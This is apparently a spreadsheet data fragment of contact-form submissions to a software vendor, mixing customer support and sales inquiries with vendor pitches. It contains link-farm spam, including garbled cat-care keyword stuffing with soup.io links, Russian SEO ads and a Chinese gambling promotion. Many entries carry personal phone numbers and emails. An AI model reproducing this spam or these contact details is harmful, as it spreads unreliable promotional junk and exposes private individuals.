•	Chef’s kitchen and fully stocked portable bar _x000D_
In the spirit of the holiday season, we are offering a 10% discount if you book before November 20th._x000D_
_x000D_
Visit www.horizonseventcenter.com or call us at (470) 299-6349._x000D_
Transform your holiday vision into a reality at Horizons Events Center._x000D_
 _x000D_
Happy Celebrating,_x000D_
From your friends at Horizons Events Center_x000D_
 _x000D_
_x000D_
 _x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
Submit Inquiry _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Copyright © *2017 * *Horizons Event Center*, All rights reserved._x000D_
*Holiday Promo* *|Newsletter*_x000D_
_x000D_
Our mailing address is:_x000D_
*4990 Jimmy Carter Boulevard, Norcross, GA 30093*_x000D_
_x000D_
Want to change how you receive these emails?_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>good morning_x000D_
We have a person from our company interested in examining  5-8055 themselves in the certification._x000D_
_x000D_
We need to know how we can manage it and what its price is._x000D_
_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Someone contacted me about a week before but no one has gotten back to me with regards to our requirements.  I would like to follow up.</t>
  </si>
  <si>
    <t>Interested in EDI services</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a Mobile solutions provider based in India. We have strong expertise on working on native and cross platform development using Telerik and Meteor framework and Node.js &amp; React. We have been developing Mobile and Web applications for our partners in the UK and European market. _x000D_
_x000D_
I want to check if we can support you in your mobile app development projects. We can have a short call as per your availability to explore more on how we can develop a mutually beneficial relationship._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Astrea's other Expertise include :-_x000D_
- Customer Relationship Management using Salesforce(Manage Customers, Cross Selling, Marketing Automation)_x000D_
- Customer Support solutions using Service Cloud(Call Centers, Web Chat, Live agents, Ticket Management)_x000D_
-  Business Intelligence using Klipfolio (Reports and Dashboards)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have contacted about getting more Right Fax information with no replay, I am trying one more time to get info. Please have someone contact me, thank you.</t>
  </si>
  <si>
    <t>Would like to undelete a folder if possible.  Please provide instructions.</t>
  </si>
  <si>
    <t>I have noticed a number of hotel bookings have been reserved at our hotel for travellers from your company.  I would be happy to discuss a corporate discounted corporate rate going forward, I look forward to hearing from you._x000D_
_x000D_
Best regards_x000D_
Sophia Ives</t>
  </si>
  <si>
    <t xml:space="preserve"> Online shoopping for Litter Scoops - Litter &amp; Housebreaking from a great selection at Pet Supplies Store. Onhline shopping for Litter Scoops ... Cat Litter Scoop  NOTE: Since htis post, Aldi has released cat litter ynder a new brand, Heart to Tawil. Read our review of the new cat litter at this link. Aldi has a small  Looking for a soft, fine cat litter? Try kitten litter. &lt;/i&gt;.&lt;br&gt; &lt;h3&gt;Persuading YourCatto Eat -  Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
 [url=http://233frunepnutoay.soup.io/]Natural cat repellent for carpet[/url] [url=http://9consgilvendzu3s.soup.io/]How long do cats live indoors[/url]  _x000D_
 LPT REQUEST: Gettingcatpee smell out of aleatherjacket ... Your rbowser indicates if you've visited this link I babysat my mother'scatand she peed on myleatherjacket. She knocked it down from where it was hanging, dragged it into a corner qnd peedon ...   More reuslts.&lt;br&gt; &lt;h3&gt;Veterinarian Q &amp; A: Understanding Cystitis  The Purring Post&lt;/h3&gt;.&lt;br&gt;  _x000D_
domestic cat characteristics _x000D_
 _x000D_
 Comfort Zone with Feliway Spray controls urine marking and scratching, calms cats in transport and comforts cats in stressed environments. This unique product is a  &lt;strong&gt;ComfortZonefor Cats &amp; Dogs  Pet Supplies - Valley Vet Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; BringingCatsIndoors  Indoor Pet Initiative Your browser indicates if you've visited this link  domesticcatswho have been abandoned or have strayed from home and become  known human ...   More results.&lt;br&gt;  _x000D_
  [url=http://262agstirca-i32.soup.io/]Cat litter box spray[/url] [url=http://credetves-biev.soup.io/]Why do fixed male cats spray[/url]  _x000D_
 Blood in urinemay appear as reddening or darkenedruineor otherurinecolor channges such as smoky, orangish or pinkish hues. Visiblestreaks of  In Urine - Bleeding in Urine - Symptoms, Causes, Treatments  information aboutblood in urine( hematuria ) in males and females. Learn the causes ofblood in urineand when the symptom may indica</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://bit.ly/2xbgWwR]ссылка что это[/url]_x000D_
</t>
  </si>
  <si>
    <t>our company will migrate to windows 10 shortly._x000D_
we use EXCEED V14 multi lang; is it compatible with W10? please advice</t>
  </si>
  <si>
    <t>Hi, I am looking for Customer Communication Management (CCM) Software to enable the creation, delivery, storage and retrieval, and analysis of outbound and interactive communications. This is for the support of digitalization objectives.</t>
  </si>
  <si>
    <t>I need access to knowledge centre for an urgent bid I am working on. I've registered and confirmed. Can you help me get this expidited or tell me the SLA on this please. Thanks, Anthony</t>
  </si>
  <si>
    <t>I am having problems using the Opentext website - Every time I try to access documents either via a link or by trying to go to the support area, I keep getting prompted for my username and password so I basically can't access anything apart from the log in page. It doesn't state that my username or password is incorrect, it just takes me to a page where I can see the option to return to the original URL (if I'm trying to view a document via a link provided by a colleague) but then when I click on the link, I get prompted for a password again. This also happens if I go through the password page and then replace the url with my original document link. I'm guessing the permissions on my account are incorrect for some reason so can you please amend my account to re-enable my access? I should have the same access as my colleagues; Andy Cronin and Gareth Solomon who also work for the Planning Inspectorate (PINS). Many thanks</t>
  </si>
  <si>
    <t>OpenText™ Fax2Mail for Healthcare</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team, _x000D_
My name is Desislava Simova and I work as a Sales Specialist in Telelink EAD (www.telelink.com). I have a request to you regarding our customer Raiffeisen bank request. The request is about support of:_x000D_
1. EMC Document Sciences xPression licenses (full package) - starting from January 2018_x000D_
2. EMC Document Sciences xPression: xDesign Client - starting from June 2018_x000D_
_x000D_
The support duration should be 12 month. Is it possible to combine the support of two applications? If possitive, how about the price after grouping and two different start date of support?_x000D_
As I have to prepare my proposal to my customer in short terms, hope to receive your assistance ASAP._x000D_
_x000D_
Thank you in advance!_x000D_
Kind regards, Desislava_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern_x000D_
Dear Sir/Madam_x000D_
We are looking for an ECM solution for our on-premises SharePoint server, through our research we came up with your solutions. I was wondering how can we receive a trial version of your software? I would appreciate it if you please let me know how can we get a trial version of your SharePoint solutions?_x000D_
_x000D_
Best regards_x000D_
Kazim Ali Khan </t>
  </si>
  <si>
    <t>На наших заводах установлено самое современное оборудование, что позволило автоматизировать процесс изготовления бетонных смесей. Доставка строительных смесей осуществляется на собственном автобетономесительном транспорте в количестве 30 штук (200 м.куб.), подробнее читайте на сайте [url=http://rusbetonplus.ru]rusbetonplus.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Procurement of new Myriad licenses. </t>
  </si>
  <si>
    <t>★祝测即宋28-88圆 ~! 免打流水满百提 下APP再宋8-88红包~！_x000D_
★特邀首寸100%！寸100宋200 寸1000宋2000！_x000D_
【八大劳虎鸡、真人视讯、捕鱼、大漫贯、PT-SW】多种玩法~！_x000D_
VIP特邀链接：www.youle138.com 备用：www.youle810.com 专属客服QQ355915762</t>
  </si>
  <si>
    <t>Hi,_x000D_
Is there any vacancies for Testers(Automation/Manual).please inform.</t>
  </si>
  <si>
    <t>Please ask your Account Executive for Ausgrid give me a call on 0408 966 038.  Need to have a discussion on your OCR solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi;_x000D_
_x000D_
Can you confirm what Workflow Designing and managing training and resources are available ?_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Rick_x000D_
</t>
  </si>
  <si>
    <t>Is there a report runtime like Eclipse Birt runtime for OpenText? _x000D_
So that I can create report in command line._x000D_
_x000D_
Thanks, Ted</t>
  </si>
  <si>
    <t>Перед тем, как заступить на службу в полицию, в течение полугода молодые бойцы изучали правовые дисциплины, основы оказания первой помощи, отрабатывали боевые приёмы борьбы, нарабатывали физическую и огневую подготовку. Подробнее читайте на сайте [url=https://astrakhan.net]astrakhan.net[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;chew toys for cats?  The Cat Site&lt;/i&gt;.&lt;br&gt; BigCFat4  Incl. -  Your browsre indicates if you've visited this link Stay at The Winds Resortthe area's premier oceanfront rseort (located just 5 -10 minutes away from thecourses ). Play all fourBigCatCourses :  /big-cat-4-nite4-courses-all-inclusive-pkg/ More results.&lt;br&gt;  _x000D_
 [url=http://48inimigoei.soup.io/]Silly cat face[/url] [url=http://constisirade.soup.io/]Aggressive dog training[/url]  _x000D_
 &lt;h4&gt;howdo oyugetcaturinesmelloutofcouch cushions?  Yahoo ... Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;h2&gt;TabbyCatHeadSizes?  Yahoo Answers Your browser ineicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
dog spraying in house _x000D_
 _x000D_
 &lt;h3&gt;What Do YourCat вЂ™sPositionsMean? - The DailyCat&lt;/h3&gt;.&lt;br&gt; &lt;i&gt;UrineBlockagein Newborns  NIDDK Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://tadofir-wohk.soup.io/]Bengal x kittens[/url] [url=http://daevislermala.soup.io/]Ky spray for men[/url]  _x000D_
 В· My cat has UTI.. What medication is best from ... UTI.. What medication is best from petco I ... such thing as a over the counter treatment for   for FelineUrinary Tract Infections&lt;/h2&gt;.&lt;br&gt; &lt;strong&gt;SentryStopThat! Behavior CorrectionSpray- 1800PetMeds&lt;/strong&gt;.&lt;br&gt;  _x000D_
dark green metallic spray paint _x000D_
 _x000D_
OrangeCatsforSaleand Adoption OrangeClassifieds Your browser indicates if you've visited this link CatsForSale  Himalayan Color-Point Persian kittens forsale , CFA, seal points,  very unique deep coloured very playful and loving ...  /pets/cats/orngae-cap?age=2 More results.&lt;br&gt; &lt;h2&gt;My 15 year old cat is peeing everywhere; in bags, laundry baskets  Р¶РѕРІС‚. 2013 СЂ. -One suggestion is to put a boxeverywherehe's gone. Another ... Don't use bleach to cleancat urine , as that canm actually act as an attractant. ... The behavioral squabbles ovre territory / smellingoldspots is harder to deal  _x000D_
[url=http://19tiodevulkahu.soup.io/]Ssscat soray deterret fokr cats[/url] [url=http://inrafau-heg5.soup.io/]</t>
  </si>
  <si>
    <t>Последние новости строительства здесь [url=http://distroy.ru/]distroy.ru[/url]</t>
  </si>
  <si>
    <t>Загородное строительство всегда было популярным во все времена. Потребители, устав от суеты шумных городов, устремлялись на природу, подробнее об этом читайте на сайте [url=http://montazhnik02.ru]montazhnik02.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">need to raise sr open test._x000D_
We are getting below issue while accessing folder object using extraction utility.  Request your assistance to resolve this issue _x000D_
 _x000D_
Error Message - _x000D_
DfAspectOperationException:: THREAD: main; MSG: [DFC_BOF_UNKNOWN_ASPECT] The specified aspect com.documentum.services.preset.aspect.PresetLocationAspect is not registered in the masdar_prod docbase.; ERRORCODE: ff; NEXT: null_x000D_
 </t>
  </si>
  <si>
    <t>Ремонт уже давно перестал считаться вселенской катастрофой, устроенной в отдельно взятой квартире или доме. Вы убедитесь, что ремонт сегодня, благодаря новейшему строительному оборудованию и материалам, стал истинным удовольствием как для самих хозяев жилища, так и для строителей, читайте об этом подробнее на сайте [url=http://blitz-remont.ru]blitz-remont.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> Howto get rid of dog pee or cat urine from carpet or wood folors when selling a home with pet odors that linger. What not to use. Effective  and GettingRid of Pet Urine  get rid of dog and cat urine odors the all natural way. ... began and pet urine ... for way to get rid of urine smell from carpet and truly  Ridof Dognad aCt Urine Odors The All Natural  these steps to clean up stains and get rid of odors when your dog or cat ... Soak up as much of the urine as ... As long as your pet can smell their  Pet Urine Smell Easily-&lt;/strong&gt;.&lt;br&gt; Ther InternationaqlBengalCatSociety Homepage Your browser indicates if you've visited this link A touch of nature's beauty with the lovingdispositionof the domesticcat. TheBengalis a medium to large domestic feloine that ...   More results.&lt;br&gt;  _x000D_
 [url=http://405vilatminiuc.soup.io/]Automatic water sprayer for cats[/url] [url=http://9cetiamilfudi.soup.io/]How to get pee smell out of leather[/url]  _x000D_
 &lt;u&gt;The Ultimate uide to EliminatingCatPeeSmell petMD Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; &lt;h3&gt;How toGetCatUrineSmellOutofCouchGetSellOut&lt;/h3&gt;.&lt;br&gt;  _x000D_
brown tabby kitten names _x000D_
 _x000D_
 &lt;h3&gt;OdorRemoval forUrineSoaked Sofa - Home cE 101 Your browser indicates if you've vistied this link&lt;/h3&gt;.&lt;br&gt; ItвЂ™s important to become an expert in feline body language. ... A fear-aggressive cat is extremely fearsome in itself; this is a cat that can hurt you,  Aggression In Cats - Jackson Galaxy Store &lt;/strong&gt;.&lt;br&gt;  _x000D_
  [url=http://diocohydsedk.soup.io/]Cat litter dome[/url] [url=http://24constania-nomg.soup.io/]Cats behaviour with other cats[/url]  _x000D_
 &lt;u&gt;Urinalysis: Testing aUrinSeample -  Your browser indicates if you've visited this lpink&lt;/u&gt;.&lt;br&gt; WebMD discussescatbladder and urinary tract problems and infections including symptons, causes, and treatments. ... a urinalysis and possiblyurineculture,  to be leakingurine . Why Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
how to make my cxat stop peeing e</t>
  </si>
  <si>
    <t>Hi there - we are currently developing in Opentext Cordys 10.6 and require access to the full documentation. The knowledge base is currently down and we have no access to documentation. Can you please tell us if there is a way to download the documentation for offline use?_x000D_
_x000D_
Ed Kang_x000D_
862-204-9034</t>
  </si>
  <si>
    <t>i want to join as a worker with you!</t>
  </si>
  <si>
    <t xml:space="preserve">Mobileyell - это оазис для тех, кто ценит новости и развлечения. На портале вы найдете юмор, комиксы, головоломки, приколы, анекдоты, картинки, где нужно найти отличия видео приколы, клипы, фото, обои, видеоигры и еще много всего любопытного. _x000D_
Mobileyell – территория, где вас встретят развлечения, смех и отдых. _x000D_
На нашем сайте любой непременно найдет для себя что-то занятное. _x000D_
Музыка онлайн, кино, любовь, отношения, животные, афиша, бесплатные фото, обои фото, регулярно обновляемые на сайте заценит мужчина и женщина. _x000D_
Те, кого интересует музыка, песни могут на сайте  скачать музыку 2017, слушать онлайн в хорошем качестве музыку, хиты слушать онлайн, новое слушать онлайн, радио онлайн слушать бесплатно. Если уж говорить о радио, то больше всего наши посетители любят русское онлайн слушать бесплатно и европа плюс слушать онлайн. При этом, у нас, представлены как давно полюбившиеся всем треки, так и новинки музыки 2017. Если же вам больше нравится музыка прошлых годов, попробуйте  музыку 90 х слушать онлайн, или же 80 слушать онлайн. Наш ассортимент настолько широк, что здесь можно шансон слушать онлайн бесплатно, аудиокниги слушать онлайн и даже слушать онлайн детские песни и программы. У нас можно все песни слушать онлайн бесплатно и без регистрации. _x000D_
Сейчас каждый слушающий музыку онлайн меломан, знает, что музыка онлайн бесплатно, музыка скачать бесплатно новинки – это Mobileyell. _x000D_
Любители музыки также часто хотят скачать клипы, смотреть клипы, смотреть русские клипы или слушать клипы. Нередко ищут клипы группы, клипы 2017 новинки,  клипы русские новинки, зарубежные клипы, порно клипы, клипы 2016,  клипы подряд, клип года. _x000D_
Любители смотреть онлайн видео, а также фильмы и сериалы также будут рады контенту Mobileyell. У нас вы можете смотреть онлайн бесплатно в качестве, смотреть фильмы онлайн бесплатно, смотреть онлайн бесплатно все серии, смотреть онлайн русское, онлайн смотреть бесплатно прямой эфир. _x000D_
Заходите на Mobileyell скачать видео, смотреть видео </t>
  </si>
  <si>
    <t>Привет! Класный у вас сайт! _x000D_
Нашел интересные материалы для владельцев частных домов и не только:   [b] [url=http://www.ekolestnica.ru/]резные столбы из дерева цена[/url] _x000D_
Тут: http://www.ekolestnica.ru/balyasiny-reznye.html [b] заходной столб для лестницы купить [/b] _x000D_
Здесь: [url=http://www.ekolestnica.ru/balyasiny-v-moskve.html] балясины и столбы купить [/url] _x000D_
Тут: http://www.ekolestnica.ru/mebelnyj-shhit-v-belgorode.html _x000D_
http://www.ekolestnica.ru/mebelnyj-shchit-iz-sosni.html [b] изготовление мебели из мебельного щита [/b] _x000D_
[url=http://www.ekolestnica.ru/ceny-na-mebelnyj-shhit.html] мебельный щит 800х2000 [/url]</t>
  </si>
  <si>
    <t>Please let me know the latest version and service pack for xPression.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
We are providing following Outsourcing Services based in Mumbai, India:_x000D_
_x000D_
Data Entry:_x000D_
_x000D_
•	Online Data Entry_x000D_
•	Offline Data Entry_x000D_
•	Logistics Data Entry_x000D_
•	Image Data Entry_x000D_
•	Manual Data Entry_x000D_
•	Copy Paste Data Entry_x000D_
•	Document Data Entry_x000D_
•	Document Management_x000D_
•	Electronic Document Management_x000D_
•	Invoice and Billing Data Entry Processing_x000D_
•	Product Data Entry_x000D_
•	Application Forms Data Entry_x000D_
•	Ecommerce Data Enty Support Using, Magento, WooCommerce, etc._x000D_
_x000D_
Data Processing:_x000D_
_x000D_
•	Data Processing_x000D_
•	Order Entry and Processing_x000D_
•	Purchase Order Management_x000D_
•	Transaction Data Processing_x000D_
•	Records Indexing_x000D_
•	Survey Forms Processing_x000D_
•	Order Processing_x000D_
•	Mailing List Compilation_x000D_
•	Word Processing and Formatting_x000D_
_x000D_
If you have any requirements, please contact us for further discussions._x000D_
_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
_x000D_
Dilavar Shah_x000D_
_x000D_
Fa’HiNDS Solutions_x000D_
5, Laxmi Vilas Bunglow, 4th Carter Road, Borivali East, Mumbai – 400066, India_x000D_
P  +91 99694 06332 / +91 84336 33166   _x000D_
W  www.fahinds.com  |   E  sales@fahinds.com_x000D_
_x000D_
skype:  shahdilavar</t>
  </si>
  <si>
    <t>Американская компания Zebra Medical Vision представила алгоритмы искусственного интеллекта, которые помогут проведению полного медицинского обследования, подробнее об этом читайте на сайте [url=http://tvoi-noski.ru]tvoi-noski.ru[/url]</t>
  </si>
  <si>
    <t>Мама не только не досыпает ночами, волнуется и заботиться, чтобы ребёнок был здоров, счастлив. Мама – это окно в большой мир! Она помогает ребёнку понять красоту мира. Мама с нами всю жизнь.Подробнее читайте на сайте [url=http://farvarter.ru]farvarter.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I have website that offers digitizing a photo to DXF. The digitized DXF file can be used to insert an image as database not raster where image is that allow 3DView and 3DRotation for inserted image not linked or given the fact by choice of inserting an image in database form not raster or linked where each block of the photo in effect becomes like a jigsaw piece where finite selections made this time where photo can used engineering wise in architectural world or CNC industry. DXF file also allow CNC applications to make use of the image since data not raw image anymore. The digitized image does not turn a picture arcs and lines to a drawing arcs and lines as may expected, but instead the image is turned to database so can be processed by an architect or a CNC applications. The website address is,_x000D_
http://digitalxf.host22.com_x000D_
It is an interesting matter in matter of fact and if it is to your interest in any way to list these information on your website then please do not hesitate to do so. Thanks and best regards,_x000D_
Robert Mikhael._x000D_
Mob:  04 24605414_x000D_
Email:  robert_mikhael@hotmail.com_x000D_
Address:  22 Melrose Terrace, Somerville 3912, Victoria._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Are there connectors available for the new Xerox devices AltaLink and VersaLink?_x000D_
</t>
  </si>
  <si>
    <t>Prezados, quem seriam os representantes de vocês no Brasil para treinamento do Gupta Team Developer.</t>
  </si>
  <si>
    <t>Queremos saber si tienen representante local en Argentina. Estamos interesados en ver una demo del producto._x000D_
_x000D_
Muchas gracias!</t>
  </si>
  <si>
    <t xml:space="preserve">Pls let us know what is wrong with our support? Why don't we have access to support portal_x000D_
This is our product ID_x000D_
_x000D_
628AE423-D6C4-4F74-B03E-F3DD56B31108_x000D_
_x000D_
Pls let us know_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to get documentation on SharePoint for Brava that we recently implemented at Kinross Gold, the two people that I have contact information have left your company. There were some links in an email, but none of them are available anymore, so I would like to get the documentation. _x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Samantha</t>
  </si>
  <si>
    <t>I would like to talk about RightFax for our organization. We are a very small hospital in Rural Vermont. E-mail is best for initial contact. Thanks,_x000D_
Travis</t>
  </si>
  <si>
    <t xml:space="preserve">Have issues with the socks installation there are not responding after the installation </t>
  </si>
  <si>
    <t>Are you no longer offering the free Brava Reader?  I have submitted two requests over the last week but have not received a download e-mail.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was wondering if I could get pricing for the following._x000D_
138020160P	Encase Forsensic Physical License 	5_x000D_
310600010	Encase Forensic Maintenance 	5_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>Received My Support registration confirmation and confirmed via the link provided. Still cannot access My Support link after confirming via link. Thank you.</t>
  </si>
  <si>
    <t>I am apply for a sales position at a company named JagWire Technologies and verifying their credentials. They mention OpenText as one of their Partners and would like a confirmation of this Partnership if you can please.</t>
  </si>
  <si>
    <t>Will need to open a service request for documentum product. Please assist with getting access to suppoort portal</t>
  </si>
  <si>
    <t>Hi I am from IT dept at General Star _x000D_
Many faxes to 1-866-464-3678 are mangled/compressed with data loss. _x000D_
_x000D_
Can someone contact us?_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Rajesh Allu_x000D_
Office 2033286377_x000D_
E-mail - rajesh.allu@genre.com</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
last Monday I sent you a request for a quote regarding an official tender of the Company Amprion. Since than I do not received any answer/call etc. from Opentext. Because we have our first meeting regardings our proposed solution, we need this Information untill Monday (13th November)._x000D_
Can you give me the current status of my request._x000D_
With kind regards_x000D_
_x000D_
Alexander Paul</t>
  </si>
  <si>
    <t>Can you please send me a copy of your company W-9 Form along with the remittance address for payments made by check.  _x000D_
Thx</t>
  </si>
  <si>
    <t xml:space="preserve">Can't login. Can't reset password either. </t>
  </si>
  <si>
    <t>We are interested in including you in an RFI for WCM.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am the Marketing Manager at First Healthcare Product and we are sharing a split island with the OpenText tradeshow booth at HIMSS18 in March. I'd like to connect with the person in charge of their display for the show so we can coordinate specifics of the back wall. They can reach me directly at 716-731-7811 or tswiatek@firstproducts.com_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I believe you would be interested in an opt-in database of IT Decision Makers with company &amp; contact name, title, email, address, phone &amp; fax number, employee size, sic code, revenue, etc._x000D_
_x000D_
To name few titles: CEO, CIO, CFO, CTO, COO, VP, President, Director, Owners, Senior HR, Head of Sales/Marketing, Manager, IT Professionals, Administrators, etc._x000D_
_x000D_
Please let me know your requirement. I will get back with you few samples._x000D_
_x000D_
Target Industry:  ___?___; Geography:  ___?___; Job Title:  ___?___:_x000D_
_x000D_
Thanks you._x000D_
_x000D_
Shawn Christian_x000D_
shawn.christian@v3dataintel.com_x000D_
</t>
  </si>
  <si>
    <t>Женские истории обо всем: о модных тенденциях и личном стиле, красоте, уходе за собой, а также о любви, отношениях. Увлекательные бесплатные тесты для девушек не дадут вам заскучать, откроют что-то новое, как в вас самих, так и в окружающих людях. А еще у нас на сайте вы сможете рассчитать дату овуляции, примерную дату рождения малыша и даже произвести расчет вашего числа судьбы! Подробнее читайте на сайте [url=http://ladystory.ru]ladystory.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> В· Real Estate Investor Educational Series How to permanently eliminate cat urine, catpee ,, pet odor.&lt;br&gt; Are you trying to keep him off thecouch , ... I would also suggest just Googling "cleaningurinesmells fromleatherfurniture." Ya neevr know what might come  tColeanDogUrineOffofLeather Cuteness Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
 [url=http://arurex-nazi.soup.io/]How to repel cats from yard[/url] [url=http://55commelvo-mak5.soup.io/]Matte spray paint[/url]  _x000D_
 How to make an indoor grass petpottyВ»  Blog Your browser indicates if you've visited this link Sometimes dogs orcatsnedean indoor place to gopotty . You might be housetraininga baby kitten or puppy, getting an outdoorcatused to being and going  /blog/how-to-make-an-indoor-grass-pet-potty/ More results.&lt;br&gt; Ikeepsmellingurine everywhere and it is becoming very bothersome. A few months ago, Ikeepsmellinga moldy smell in - Answered by a verified Doctor.&lt;br&gt;  _x000D_
wild domestic cats _x000D_
 _x000D_
 &lt;h4&gt;Tanya's Comprehensive Guide to Feline Chronic Kidney Disease ... Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; For a long time mycatand his brother  Everywhere HELP. ... she tried everything before she finally went to see my  to Do When aCatGoes Outside hte Litter Box Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
  [url=http://arurex-nazi.soup.io/]How to repel cats from yard[/url] [url=http://0causubcu-tanp.soup.io/]Why is my cat angry[/url]  _x000D_
 &lt;h4&gt;NaturalCat Uine Odor Eliminator SprayBy Getodroout&lt;/h4&gt;.&lt;br&gt; &lt;h3&gt;CatToys: The Humane Society of the United States Your broweser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
home remedues for cslming cats _x000D_
 _x000D_
What is the bset way tlremovepet odor fromconcrete ? - Home ... Your browser indicates if you've visited this link What is the best way toremovepet odor fromconcrete ? ... I had a reallpy bsdcaturineodor problem ... You probably won't  be able toremoveanything that is causing ...   More results.&lt;br&gt; The</t>
  </si>
  <si>
    <t xml:space="preserve"> Borivilla Expandable WireBangleFor oWmen Girl When I Needed A Hand I Found Your Paw Bracelet DogCatPet Paw Prnit Charm.&lt;br&gt; &lt;i&gt;Catwas given clavamox forurineinfection and it hasnt gone ... Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://0causubcu-tanp.soup.io/]Why is my cat angry[/url] [url=http://50helcermetneb5.soup.io/]Mattress stains[/url]  _x000D_
 CitiKitty Update вЂ“ After Shark Tank Aired ... The retail price for CitiKitty is  and each set ... The Gazettge Review is your daily news source covering  TV Stint Puts CitiKitty Near $1 Million Mark - In Charge - WSJ &lt;/h2&gt;.&lt;br&gt; Mycatis urinatingfrequentlyand insmall amiunts . I took herr to the vet and they fuond blood in her urine. They did - Answered by a verifiedCatVeterinarian.&lt;br&gt;  _x000D_
blood and protein in urine _x000D_
 _x000D_
 A number of foods cancauseyoururineto have a strong odor, especially if you aren't dirnking much water. ... If yoururineis dark and strongsmelling ,  how to get rid of strongurineodor? Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; How toGetRidofDogUrineSmell-DogUrine Your browser indicates if you've visited this link How toGetRudofDogUirneSmell . by ... Thesmellofdog'surinecan sapoil the fragrance of your home ... Enzymmatic cleaners are thebestwhen it comes to ...  /how-to-get-rid-of-dog-urine-smell/ More results.&lt;br&gt;  _x000D_
  [url=http://19ramlibur-ram4.soup.io/]Best litter for kittens training[/url] [url=http://955lionacunex3.soup.io/]Cat odor in carpet[/url]  _x000D_
 &lt;i&gt;Urinesmellsfunny . вЂ” Penny Arcade Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; WhyIsMyCatPeeingOutside Her Litter Box? - Petfinder Your browser indicates if you've visited this link   FurKedps Kickoff Ask the Experts Forum. Q: I have acatwho pees inappropriately on a towel at the back door of ourhouse .   More results.&lt;br&gt;  _x000D_
urine sprays out _x000D_
 _x000D_
&lt;h3&gt;CatUrinary Tract Diseases: Cystitis, Urethral Obstruction ... Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; RadioSystem</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for opportunity in Manual Testing._x000D_
Having 4+ Years of experience in Manual Testing (Functional, System, Regression, User Acceptance, Sanity, Smoke, Telecom Billing &amp; Integration). </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
_x000D_
_x000D_
Greetings from Adityaan Solutions,_x000D_
_x000D_
_x000D_
          We take the opportunity to introduce ourselves as Adityaan_x000D_
Solutions, one of the upcoming End to End HR Services provider,_x000D_
_x000D_
            Our services guarantee on being reliable, satisfactory and_x000D_
customer oriented. We master in providing impeccable leading edge_x000D_
HR Services and Solutions. We provide a range of services:_x000D_
_x000D_
1)      Recruitment Procedures,_x000D_
2)      Background Verification/ Check,_x000D_
3)      Induction &amp;Training and Development,_x000D_
4)      Employee Relation,_x000D_
5)      Compensation Designing &amp; Payroll Process,_x000D_
6)      Benefits Management,_x000D_
7)      Performance Management Support,_x000D_
8)      Employee Engagement &amp; Event Management,_x000D_
9)      HR Policies &amp; Procedure and Exit formalities._x000D_
_x000D_
_x000D_
Am waiting for your call if you are interested......_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Support Team_x000D_
 _x000D_
_x000D_
Adityaan Solutions_x000D_
# Flat No: 302, Sanman PMR Heights,_x000D_
Opp. Lutheran Church, Lakdi-ka-pul,_x000D_
Hyderabad._x000D_
Website: www.adityaan.in_x000D_
PH: 8019009001/ 9885009001_x000D_
</t>
  </si>
  <si>
    <t>We are looking to automate our Accounts Payable (AP) Process, right from capturing/scanning of invoices, processing it through workflow till final posting to FI. Also need to explore possibility for other Modules such as Accounts Payable (AR), SAP HR, Travel etc.</t>
  </si>
  <si>
    <t>Оказывается, сон больше или меньше 7-7,5 часа в сутки существенно повышает риск рака легких и слабоумия. К такому выводу пришли специалисты из Университета Восточной Финляндии. Исследователи проанализировали данные 2682 мужчин, читайте об этом подробнее на сайте [url=http://dettka.com]dettka.com[/url]</t>
  </si>
  <si>
    <t>interesting in RightFax</t>
  </si>
  <si>
